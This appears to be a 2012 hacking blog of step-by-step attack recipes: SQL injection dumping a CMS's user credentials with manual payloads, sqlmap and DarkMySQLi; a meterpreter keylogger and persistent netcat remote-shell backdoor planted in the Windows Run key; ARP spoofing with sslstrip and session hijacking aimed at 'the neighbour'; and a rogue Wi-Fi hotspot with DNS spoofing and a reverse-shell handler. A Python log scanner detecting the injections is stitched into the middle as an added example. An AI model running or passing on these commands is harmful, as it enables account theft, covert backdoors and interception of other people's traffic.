Monday, 9 April 2012

Advanced SQL injection (5 ways to take control of a website)

havij | manual | mms_05.jar | DarkMySQLi | sqlmap
the vulnerable CMS can be downloaded from here:
http://www.exploit-db.com/exploits/18708/
1. havij
download
http://itsecteam.com/en/projects/project1_page2.htm
2. manual
http://192.168.1.102/GENU-2012.3/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
3. mms_05.jar
download
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
java -jar mms_05.jar
http://192.168.1.104/GENU-2012.3/
4. DarkMySQLi
cd /pentest/web/darkmysqli
python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --findcol

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --dbs

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --full

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" -D baza -T genu_users -C user_name,user_password --dump

5. sqlmap
cd /pentest/database/sqlmap/
python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --dbs

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza --tables

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users --columns

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users -C user_email,user_name,user_password --dump

GAME OVER
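Added example, not from the original post: a Python scan over constructed Apache access-log lines that flags the injection patterns used in the commands above (UNION SELECT, AND 1=2, hex literals, the darkc0de column filler, the sqlmap User-Agent) on a parameter that should only ever be an integer. The log lines, IPs and timestamps are constructed, and the NUMERIC_PARAMS whitelist is an assumption about the application.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache access-log lines (not from the original post): the first
# three mirror the article_id injections shown above, the last is a normal request.
SAMPLE_LOG = """\
192.168.1.50 - - [09/Apr/2012:12:00:01 +0200] "GET /GENU-2012.3/articles/read.php?article_id=null%20union%20select%201,concat(user_name,0x3a,user_password),3,4,5%20from%20genu_users-- HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
192.168.1.50 - - [09/Apr/2012:12:00:05 +0200] "GET /GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de-- HTTP/1.1" 200 1871 "-" "Mozilla/5.0"
192.168.1.50 - - [09/Apr/2012:12:00:09 +0200] "GET /GENU-2012.3/articles/read.php?article_id=1%20AND%201=1 HTTP/1.1" 200 4102 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.77 - - [09/Apr/2012:12:01:00 +0200] "GET /GENU-2012.3/articles/read.php?article_id=42 HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Each rule is matched against the %-decoded value of every query parameter.
VALUE_RULES = {
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    "boolean_condition": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "sql_comment": re.compile(r"(--|#|/\*)\s*$"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "darkc0de_marker": re.compile(r"darkc0de", re.I),  # DarkMySQLi's column filler
}
UA_RULES = {"sqlmap_user_agent": re.compile(r"sqlmap", re.I)}
# Assumption: the application only ever uses these parameters as integers.
NUMERIC_PARAMS = {"article_id"}

def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for clean/unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = set()
    url = urlsplit(m["target"])
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:  # parse_qs decodes %xx and turns '+' into spaces
            reasons.update(f"{rule}:{name}" for rule, rx in VALUE_RULES.items() if rx.search(value))
            if name in NUMERIC_PARAMS and not value.isdigit():
                reasons.add(f"non_numeric:{name}")
    reasons.update(rule for rule, rx in UA_RULES.items() if rx.search(m["ua"]))
    if not reasons:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "path": url.path, "reasons": sorted(reasons)}

def scan_log(text):
    """Run analyze_line over every line of an access log and keep only the findings."""
    return [hit for hit in map(analyze_line, text.splitlines()) if hit]
```

Run `scan_log(SAMPLE_LOG)` to see the three injection requests reported with their reasons while the plain `article_id=42` request is left alone.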

Sunday, 1 April 2012

Wednesday, 28 March 2012

meterpreter keylogger and backdoor upload

keylogger and netcat
Commands:
KEYLOGGER
migrate (pid of explorer.exe)
keyscan_start
keyscan_dump (optionally, the whole network)
keyscan_stop
UPLOAD BACKDOOR nc.exe
cd /pentest/windows-binaries/tools/
cp nc.exe /root/Desktop/ (optional)
upload /root/nc.exe C:\\WINDOWS\\SYSTEM32 (on Windows 7 we set the privileges first)
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v test -d 'C:\WINDOWS\SYSTEM32\nc.exe -L -d -p 4444 -e cmd'
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (optional: check that everything is ok)
nc <host_ip> <port>
GAME OVER

Monday, 26 March 2012

hamster + ferret

i.e. what's up at the neighbour's ;)
Commands:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan1 -t 192.168.1.107 192.168.1.1
arpspoof -i wlan1 192.168.1.1 (optionally, the whole network)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f
cd /pentest/sniffers/hamster
./ferret -i wlan1
cd /pentest/sniffers/hamster
./hamster -i wlan1
cat /root/sslstrip.log
remember to change the browser settings to use the proxy :D GAME OVER

Sunday, 25 March 2012

fake ap windows 7 exploit
Commands:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
kwrite /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
  option subnet-mask 255.255.255.128;
  option broadcast-address 192.168.2.255;
  option routers 192.168.2.129;
  option domain-name-servers 8.8.8.8;
  range 192.168.2.130 192.168.2.140;
}

airmon-ng start wlan1
airbase-ng -e "Hotspot" -c 9 mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/apache2 start
ifconfig (optional)
kwrite /usr/share/ettercap/etter.dns
arpspoof -i at0 192.168.2.129
ettercap -T -q -i at0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.131
set LPORT 4444
exploit
if anyone wants index.php and the icon, PM me on the forum :D
GAME OVER